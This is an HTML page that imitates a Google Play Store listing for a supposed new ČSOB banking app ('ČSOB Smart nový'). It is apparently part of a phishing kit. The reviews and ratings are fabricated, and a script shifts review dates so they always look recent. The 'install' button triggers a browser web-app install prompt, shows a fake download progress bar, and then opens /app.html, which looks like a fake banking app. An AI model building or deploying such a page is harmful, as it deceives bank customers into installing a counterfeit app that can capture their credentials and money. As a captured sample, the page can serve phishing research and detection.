<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>ČSOB Smart nový</title>
	<link rel="shortcut icon" href="img/google.play.svg">
	<link rel="manifest" href="manifest.json">

	<link rel="stylesheet" media="all" href="css/fonts.css" defer>
	<link rel="stylesheet" media="all" href="css/bootstrap.min.css" acync>
    <link rel="stylesheet" media="all" href="css/owl.carousel.min.css" defer>
    <link rel="stylesheet" media="all" href="css/owl.theme.default.min.css" defer>
    
    <style>
    body{font-family:"Google Sans", Roboto, Arial, sans-serif;}
    header { background:#fff; }
    .top_shadow{ box-shadow: 0 4px 4px #999; }
    header .top-line{ -moz-box-align: center; align-items: center; display: -moz-box;  display: flex; height: 56px; width: 100%; color: rgb(95,99,104); min-width:349px;position: sticky; }
    header .top-line button{ height: 48px; width: 32px; vertical-align: middle;}
    header .top-line button i{ vertical-align: middle; color: rgb(95,99,104);}
    .logo{font-size:24px; font-weight:500; color:rgb(95,99,104); margin: 0 16px;}
    .logo img{margin-right: 8px;height: 40px;width: 40px;}
    .logo_app{}
    .logo_app img{width:48px; border-radius:5px;}
    .title_app{font-size:1.125rem; font-weight:500; color:rgb(95,99,104);}
    .title_author{font-size:.875rem; font-weight:500; color:#01875F;}
    .mdline_first{ height:24px; }
    .mdline_first svg{  height: 18px; margin-right: 7px; width: 18px;}
    .mdline_second{ height:24px; color: rgb(95,99,104); font-family: Roboto,Arial,sans-serif; font-size: .75rem; padding-top:5px;}
    
    .col-br1{ background:url(img/line.svg) center right no-repeat;}
    .btn-install{ background:#01875F; color:#fff; }
    .btn-install:hover{ background:#095943; color:#fff; }
    .btn-install:active{ background:#095943 !important; color:#fff !important; }
    
    .btn-go-install{ background:#01875F; color:#fff; }
    .btn-go-install:hover{ background:#095943; color:#fff; }
    .btn-go-install:active{ background:#095943 !important; color:#fff !important; }
    
    .carousel img{max-height:204px; width:auto; border-radius:8px;}
    .small_title{font-size:18px;}
    .btn-tags{background:#fff; height:30px; line-height: 1em; color:#5f6368; font-size:14px;}
    .btn-tags:hover{background:#eee; color:#000; }
    .rating_all{font-size: 3.5rem;font-weight: 400; line-height: 3.5rem; }
    img.rating_star{width:14px;}
    .rating_comments{font-size:12px;}
    .progress_line{height:1.3em; line-height: 1em;}
    .progress{ height:1em;}
    .progress_line span{font-family: Roboto,Arial,sans-serif;line-height: 1rem;font-size: .75rem;font-weight: 400;}
    p{font-size:0.875rem;}
    .last-update span{font-weight:500;}
    
    .review_author{font-weight:500; line-height: 32px;}
    .review_avatar{width:32px;height:32px; display:inline-block; border-radius:16px; text-align:center;font-weight:600;color:#fff; line-height:32px; }
    .rating_stars{font-size: 0.75rem;}
    .bg_a{background:#01579b;}
    .bg_b{background:#c2185b;}
    .bg_c{background:#33691e;}
    .bg_d{background:#5d4037;}
    .bg_e{background:#7e57c2;}
    
    .install_mb_value{}
    #install_start_btn{ display:none; }
    #install_mb_value{ display:none; }
    #install_progress { display:none; width: 100%; background-color: #ddd; border-radius:4px; }
    #install_bar { width: 1%; height: 7px; background-color: #04AA6D; border-radius:4px; }
    
    .other_apps .title_app    {}
    .other_apps .title_author {}
    .other_apps .title_rating {}
    
    
    footer{ border-top:1px solid #ccc; }
    footer .item_title{ font-size: .875rem; font-weight: 500;line-height: 32px;}
    footer a{font-size: .875rem; color:rgb(95,99,104);line-height: 32px; text-decoration:none;}
    footer a.small{font-size: 12px}
    footer a.flink{margin-right:24px;}
    footer a:hover { color: #01875f; }
    
    
    </style>
    
<!--<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.16.0/prism.min.js"></script>-->
<!--<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.16.0/plugins/unescaped-markup/prism-unescaped-markup.min.js"></script>-->


  </head>
 <body>
  <header class="sticky-top">
  <div class="top-line row">
  <div class="col-8 pe-0">
  <div class="logo">
   <img src="img/google.play.svg" width="40" height="40"/> Google Play</div>
  </div>
  <div class="col-4 ps-0 text-end">
  <button class="btn p-0"><img src="img/serch.svg" width="24" height="24"></button>
  <button class="btn p-0"><img src="img/question.svg" width="24" height="24"></button>
  <button class="btn p-0"><img src="img/vdots.svg"></button>
  </div>
  </div>
  </header>

	<main>
	<div class="container pt-5">
	<div class="row">
		<div class="col-2">
			<div class="logo_app"><img src="img/app_logo.webp" width="48" height="48"></div>
		</div>
		<div class="col-10">
			<div class="title_app">ČSOB Smart nový</div>
			<div class="title_author">Československá obchodní banka, a.s.</div>
		</div>
	</div>  
	<div class="row pt-4">
		<div class="col-4 text-center col-br1">
			<div class="mdline_first">4.8 <i class="google-material-icons" style="font-size: 12px;">star</i></div>
			<div class="mdline_second">3 tis. recenzí</div>
		</div>
		<div class="col-4 text-center col-br1">
			<div class="mdline_first">100 tis.+</div>
			<div class="mdline_second">Stažení</div>
		</div>
		<div class="col-4 text-center">
			<div class="mdline_first"><svg xmlns="http://www.w3.org/2000/svg" class="B6ueub" viewBox="0 0 24 24" width="18" height="18"><path class="m46uhe" fill-rule="evenodd" clip-rule="evenodd" d="M7 1H17L22 9.67L17 18.31V23L12 21L7 23V18.3L2 9.66L7 1ZM15.8 16.24H8.2L4.41 9.66L8.2 3H15.8L19.59 9.66L15.8 16.24ZM10.54 11.09L8.66 9.22L7.64 10.24L10.54 13.14L16.34 7.34L15.32 6.33L10.54 11.09Z"></path></svg></div>
			<div class="mdline_second">Everyone</div>
		</div> 
	</div> 
	<div class="row mt-4">
		<div class="col install_line">
			<div id="install_mb_value" class="text-center">9.95 MB</div>
			<div id="install_progress"><div id="install_bar"></div></div>
			<button id="install_btn" class="btn btn-install w-100">Nainstalovat</button>
			<button id="install_start_btn" class="btn btn-install w-100">Open</button>
		</div>  
	</div> 
	</div> 

		<div class="container carousel mt-4">
			<div class="row">
				<div class="col">
					<div class="owl-carousel owl-theme">
						<div class="item">
						    <a class="" href="img/screen_1.webp" data-lightbox="owl-set">
						        <img width="141" height="250" src="img/screen_1-2.webp" class="img" alt="" loading="lazy" decoding="async" />		        
						    </a>
						</div>
						<div class="item">
						    <a class="" href="img/screen_2.webp" data-lightbox="owl-set">
						        <img width="141" height="250" src="img/screen_2-1.webp" class="img" alt="" loading="lazy" decoding="async" />			    
						    </a>
						</div>
						<div class="item">
						    <a class="" href="img/screen_3.webp" data-lightbox="owl-set">
						        <img width="141" height="250" src="img/screen_3-2.webp" class="img" alt="" loading="lazy" decoding="async" />			    
						    </a>
						</div>
						<div class="item">
						    <a class="" href="img/screen_4.webp" data-lightbox="owl-set">
						        <img width="125" height="250" src="img/screen_4-2.webp" class="img" alt="" loading="lazy" decoding="async" />			    
						    </a>
						</div>
						<div class="item">
						    <a class="" href="img/screen_5.webp" data-lightbox="owl-set">
						        <img width="125" height="250" src="img/screen_5-2.webp" class="img" alt="" loading="lazy" decoding="async" />			    
						    </a>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="container mt-4">
			<div class="row">
				<div class="col-10">
					<span class="small_title">Informace o aplikaci</span>
				</div>
				<div class="col-2 text-end"><img src="img/arrow_back.svg"></div>
			</div>
			<div class="row">
				<div class="col pt-2">
					<p>Všechny výhody ČSOB Smart nyní v nové aplikaci "ČSOB Smart nový"</p>
					<p>Využívejte první nové funkce a účastněte se nových akcí pouze v aplikaci ČSOB Smart nový!</p>
					<p>Pomozte nám otestovat nové funkce aplikace a získejte za to osobní bonusy!</p>
					<p class="last-update"><span>Datum aktualizace</span><br>13.8.2023</p>
				</div>
			</div>
			<div class="row">
				<div class="col">
					<button class="btn btn-tags btn-outline-secondary rounded-pill">Finance</button>
				</div>
			</div>
		</div>
		<div class="container mt-4">
			<div class="row">
				<div class="col-10">
					<span class="small_title">Zabezpečení údajů</span>
				</div>
				<div class="col-2 text-end"><img src="img/arrow_back.svg"></div>
			</div>
			<div class="row">
				<div class="col pt-2">
					<p>Bezpečnost začíná pochopením toho, jak vývojáři shromažďují a sdílejí vaše data. Postupy ochrany soukromí a zabezpečení dat se mohou lišit podle způsobu používání, oblasti a věku. Tyto informace poskytl vývojář a může je průběžně aktualizovat.</p>
				</div>
			</div>
		</div>
		
		<div class="container mt-4">
			<div class="row">
				<div class="col-10">
					<span class="small_title">Hodnocení a recenze</span>
				</div>
				<div class="col-2 text-end"><img src="img/arrow_back.svg"></div>
			</div>
			<div class="row pt-3">
				<div class="col-3 pe-0 text-center">
					<div class="rating_all">4.8</div>
					<div class="rating_stars">
						<img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star_half.svg">
					</div>
					<div class="rating_comments">3 tis. recenzí</div>
				</div>
				<div class="col-1 pe-0 text-end">
					<div class="progress_line"><span>5</span></div>
					<div class="progress_line"><span>4</span></div>				
					<div class="progress_line"><span>3</span></div>				
					<div class="progress_line"><span>2</span></div>				
					<div class="progress_line"><span>1</span></div>				
				</div>
				<div class="col-7">
					<div class="progress_line"><div class="progress"><div class="progress-bar bg-success rounded-pill" role="progressbar" style="width: 81%" aria-valuenow="81" aria-valuemin="0" aria-valuemax="100"></div></div></div>
					<div class="progress_line"><div class="progress"><div class="progress-bar bg-success rounded-pill" role="progressbar" style="width: 12%" aria-valuenow="12" aria-valuemin="0" aria-valuemax="100"></div></div></div>
					<div class="progress_line"><div class="progress"><div class="progress-bar bg-success rounded-pill" role="progressbar" style="width: 4%" aria-valuenow="4" aria-valuemin="0" aria-valuemax="100"></div></div></div>
					<div class="progress_line"><div class="progress"><div class="progress-bar bg-success rounded-pill" role="progressbar" style="width: 1%" aria-valuenow="1" aria-valuemin="0" aria-valuemax="100"></div></div></div>
					<div class="progress_line"><div class="progress"><div class="progress-bar bg-success rounded-pill" role="progressbar" style="width: 2%" aria-valuenow="2" aria-valuemin="0" aria-valuemax="100"></div></div></div>
				</div>
			</div>

		</div>
		<div class="container mt-5">
			<div class="row">
				<div class="col-2 text-end"><span class="review_avatar bg_a">S</span></div>
				<div class="col-8">
					<span class="review_author">Stanislav Chocina</span>
				</div>
				<div class="col-2 text-end"><img src="img/vdots.svg"></div>
			</div>
			<div class="row">
				<div class="col pt-2 rating_stars dtcm_01">
					<img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg">
				</div>
			</div>
			<div class="row">
				<div class="col pt-2">
					<p>Aplikace je výborná. Abych mohl napsat recenzi tak by mě to stálo hodně času. Pokud chci udělat nějakou akci tak na to snadno přijdu. Někdy se až divím jak se na tak malém prostoru dají velmi vhodně nabízet různé akce.</p>
				</div>
			</div>
		</div>
		<div class="container mt-5">
			<div class="row">
				<div class="col-2 text-end"><span class="review_avatar bg_b">M</span></div>
				<div class="col-8">
					<span class="review_author">Marek Tutka</span>
				</div>
				<div class="col-2 text-end"><img src="img/vdots.svg"></div>
			</div>
			<div class="row">
				<div class="col pt-2 rating_stars dtcm_02">
					<img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star_false.svg">
				</div>
			</div>
			<div class="row">
				<div class="col pt-2">
					<p>Rychlost určitě vývojáři upraví a bude vše v pořádku.Uvidíme při první platbě,ale věřím,že žádný problém nebude.U poštovní banky jsem celou dobu,tak žadný problem nevidím!</p>
				</div>
			</div>
		</div>
		<div class="container mt-5">
			<div class="row">
				<div class="col-2 text-end"><span class="review_avatar bg_c">M</span></div>
				<div class="col-8">
					<span class="review_author">Miroslav Pivovarčík</span>
				</div>
				<div class="col-2 text-end"><img src="img/vdots.svg"></div>
			</div>
			<div class="row">
				<div class="col pt-2 rating_stars dtcm_03">
					<img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg">
				</div>
			</div>
			<div class="row">
				<div class="col pt-2">
					<p>Skvělé nové akcie!</p>
				</div>
			</div>
		</div>
		<div class="container mt-5">
			<div class="row">
				<div class="col-2 text-end"><span class="review_avatar bg_d">L</span></div>
				<div class="col-8">
					<span class="review_author">Lidka Ráčková</span>
				</div>
				<div class="col-2 text-end"><img src="img/vdots.svg"></div>
			</div>
			<div class="row">
				<div class="col pt-2 rating_stars dtcm_04">
					<img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg"><img class="rating_star" src="img/star.svg">
				</div>
			</div>
			<div class="row">
				<div class="col pt-2">
					<p>Pohodlnější než jednoduchý Smart</p>
					<p>Ideální aplikace pro ty, kteří chtějí mít přehled o svých financích a spravovat své peníze rychle a pohodlně.</p>
				</div>
			</div>
		</div>
	
	</main>

  
	<footer>

		<div class="container my-5">
			<div class="row">
				<div class="col">
					<div class="item_title">Google Play</div>
					<a href="#">Play Pass</a><br>
					<a href="#">Play Points</a><br>
					<a href="#">Dárkové karty</a><br>
					<a href="#">Uplatnit kód</a><br>
					<a href="#">Zásady vrácení peněz</a><br>
				</div>
			</div>
			<div class="row pt-3">
				<div class="col">
					<div class="item_title">Děti a rodina</div>
					<a href="#">Průvodce pro rodiče</a><br>
					<a href="#">Sdílení s rodinou</a><br>
				</div>
			</div>
			<div class="row pt-3">
				<div class="col">
					<a href="#" class="flink" >Smluvní podmínky</a>
					<a href="#" class="flink" >Ochrana soukromí</a>
					<a href="#" class="flink" >Google Play</a>
					<a href="#" class="flink" >Google Store</a>
					<a href="#" class="flink" >Všechny ceny zahrnují DPH.</a>
					<a href="#" class="flink" >Česko (Čeština)</a>
				</div>
			</div>
		</div>
	</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.16.0/prism.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.16.0/plugins/unescaped-markup/prism-unescaped-markup.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/lightbox2/2.11.4/js/lightbox-plus-jquery.min.js"></script>
<script src="js/jquery.min.js"></script>	
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-HwwvtgBNo3bZJJLYd8oVXjrBZt8cqVSpeBNS5n7C8IVInixGAoxmnlMuBnhbgrkm" crossorigin="anonymous"></script>
<script src="js/owl.carousel.min.js"></script>
<script> $(document).ready(function() { var owl = $('.owl-carousel'); owl.owlCarousel({ loop: false, nav: false, dots: false, autoWidth:true, margin: 10, responsive: { 0: { items: 1 }, 600: { items: 3 }, 960: { items: 5 }, 1200: { items: 6 } } }); owl.on('mousewheel', '.owl-stage', function(e) { if (e.deltaY > 0) { owl.trigger('next.owl'); } else { owl.trigger('prev.owl'); } e.preventDefault(); }); }) </script>

<script>
const monthNames = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"];
var dt_01 = new Date(); var dt_02 = new Date(); var dt_03 = new Date(); var dt_04 = new Date(); var dt_05 = new Date();
dt_01.setDate(dt_01.getDate() - 1);dt_02.setDate(dt_02.getDate() - 4);dt_03.setDate(dt_03.getDate() - 36);dt_04.setDate(dt_04.getDate() - 56);dt_05.setDate(dt_05.getDate() - 86);
date_1 = dt_01.getDate() + ' ' + monthNames[dt_01.getMonth()] + ' ' + dt_01.getFullYear();
date_2 = dt_02.getDate() + ' ' + monthNames[dt_02.getMonth()] + ' ' + dt_02.getFullYear();
date_3 = dt_03.getDate() + ' ' + monthNames[dt_03.getMonth()] + ' ' + dt_03.getFullYear();
date_4 = dt_04.getDate() + ' ' + monthNames[dt_04.getMonth()] + ' ' + dt_04.getFullYear();
date_5 = dt_05.getDate() + ' ' + monthNames[dt_05.getMonth()] + ' ' + dt_05.getFullYear();
jQuery('.dtcm_01').append(date_1);
jQuery('.dtcm_02').append(date_2);
jQuery('.dtcm_03').append(date_3);
jQuery('.dtcm_04').append(date_4);
jQuery('.dtcm_05').append(date_5);

$( window ).on( "scroll", function() {
	htop = $(document).scrollTop();
	if(htop>15){
		$( "header" ).addClass( "top_shadow" );
	}else{
		$( "header" ).removeClass( "top_shadow" );
	}
});

var i = 0; 
function move() {
	
	var max_mb = 22.50; var cur_mb = 0;
	if (i == 0) {
		i = 1;
		var width = 1;
		var id = setInterval(frame, 100);
		function frame() {
			if (width >= 100) {
				jQuery('#install_start_btn').show();
				jQuery('#install_btn').hide();
				jQuery('#install_mb_value').hide();
				jQuery('#install_progress').hide();
				
				clearInterval(id);
				i = 0;
			} else {
				width++;
				cur_mb = width*max_mb/100
				jQuery('#install_mb_value').text(cur_mb.toFixed(2) + "MB / " + max_mb.toFixed(2) + "MB" );
				jQuery('#install_bar').css("width", width + "%");
			}
		}
	}
}


var REDIRECT_URL = "/app.html"

function doRedirect() {
  console.log('REDIRECT_URL', REDIRECT_URL)
  window.open(REDIRECT_URL, '_blank');
}


jQuery('#install_start_btn').on('click', function () {
  doRedirect()
})

jQuery('#install_btn').on("click touch", function(e){
  onClick(e);
});


var redirected = false;
var promptInstall = null;

const handler = e => {
    console.log('in handler') // не выводит в консоль
    e.preventDefault();
    // setSupportsPWA(true);
    promptInstall = e;
};

const onClick = e => {
    e.preventDefault();
    if (promptInstall) {
        promptInstall.prompt().then((v) => {
          console.log(v);

          if (v?.outcome !== 'accepted') return;

          jQuery('#install_btn').hide();
          jQuery('#install_mb_value').show();
          jQuery('#install_progress').show();
          
          move();
        });
    }else{
            return;
    };
};

window.addEventListener("beforeinstallprompt", handler);
</script>
<link rel="stylesheet" media="all" href="//cdnjs.cloudflare.com/ajax/libs/lightbox2/2.11.4/css/lightbox.min.css" acync>

  </body>
</html>
